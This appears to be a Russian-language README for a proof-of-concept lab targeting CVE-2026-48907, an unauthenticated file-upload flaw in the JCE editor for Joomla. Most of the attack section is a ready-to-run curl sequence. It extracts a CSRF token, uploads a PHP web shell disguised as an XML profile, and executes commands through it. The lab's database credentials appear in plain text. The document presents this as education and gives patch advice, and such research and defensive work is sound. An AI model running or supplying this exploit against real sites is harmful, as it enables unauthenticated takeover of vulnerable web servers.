
PoC для CVE-2026-48907
PSsec — образовательная лаборатория по исследованию безопасности для CVE-2026-48907.
CVE-2026-48907 — это критическая (CVSS 10.0) уязвимость неаутентифицированного удалённого выполнения кода в JCE (Joomla Content Editor), самом распространённом редакторском расширении для Joomla, затрагивающая все версии ≤ 2.9.99.4.
Конечная точка profiles.import принимает загрузку файлов без какой-либо аутентификации. Злоумышленник может загрузить вредоносный PHP-файл, замаскированный под XML-профиль, который записывается в каталог tmp/ на сервере и выполняется напрямую через HTTP — учётные данные не требуются.
| Детали | Значение |
|---|---|
| CVE | CVE-2026-48907 |
| Оценка CVSS | 10.0 Критический |
| Затронутые версии | JCE ≤ 2.9.99.4 |
| Исправленные версии | JCE ≥ 2.9.99.5 |
| Включена в CISA KEV | Да — 16 июня 2026 года |
| Активно эксплуатируется | Да |
docker compose up -d
Откройте http://localhost:8080 в браузере и завершите мастер установки, используя следующие учётные данные:
| Поле | Значение |
|---|---|
| Хост базы данных | db |
| Имя базы данных | joomla |
| Пользователь базы данных | joomla |
wget https://github.com/widgetfactory/jce/releases/download/2.9.99.4/pkg_jce_29994.zip
Затем в админ-панели Joomla: Система → Расширения → Установка → загрузите ZIP-файл.
URL=http://localhost:8080
TOKEN=$(curl -s -c cookies.txt "$URL/" \
| sed -n 's/.*"csrf\.token"[[:space:]]*:[[:space:]]*"\([a-f0-9]\{32\}\)".*/\1/p; s/.*name="\([a-f0-9]\{32\}\)"[^>]*value="1".*/\1/p' \
| head -n1)
curl -i -s -b cookies.txt -c cookies.txt \
-F "[email protected];type=application/xml" \
-F "task=profiles.import" \
-F "${TOKEN}=1" \
"$URL/index.php?option=com_jce"
curl -i -s -b cookies.txt -c cookies.txt \
"$URL/tmp/shell.xml.php?cmd=id"
Ожидаемый вывод: uid=33(www-data) gid=33(www-data)
| Файл | Описание |
|---|---|
docker-compose.yml | Поднимает уязвимую среду Joomla 5.3.1 + MySQL 8.0 |
shell.xml.php | Минимальный PHP-пейлоад веб-шелла |
instructions.txt | Пошаговые инструкции по эксплуатации |
Немедленно обновите JCE до версии 2.9.99.5 или новее.
Официальное уведомление вендора и бесплатный патч для старых версий Joomla: Обновление безопасности JCE — joomlacontenteditor.net
Этот репозиторий предназначен строго для образовательных целей и санкционированных исследований в области безопасности.
Тестирование должно проводиться только против систем, которыми вы владеете или на тестирование которых имеете явное письменное разрешение. Несанкционированное использование этого материала против систем, которыми вы не владеете, незаконно и неэтично. Авторы и Pansophical OU не несут ответственности за неправомерное использование этого контента.
Эта лабораторная среда намеренно уязвима. Не выставляйте её в интернет или в любую ненадёжную сеть.
Автор: PSsec
| Пароль базы данных | joomlapass |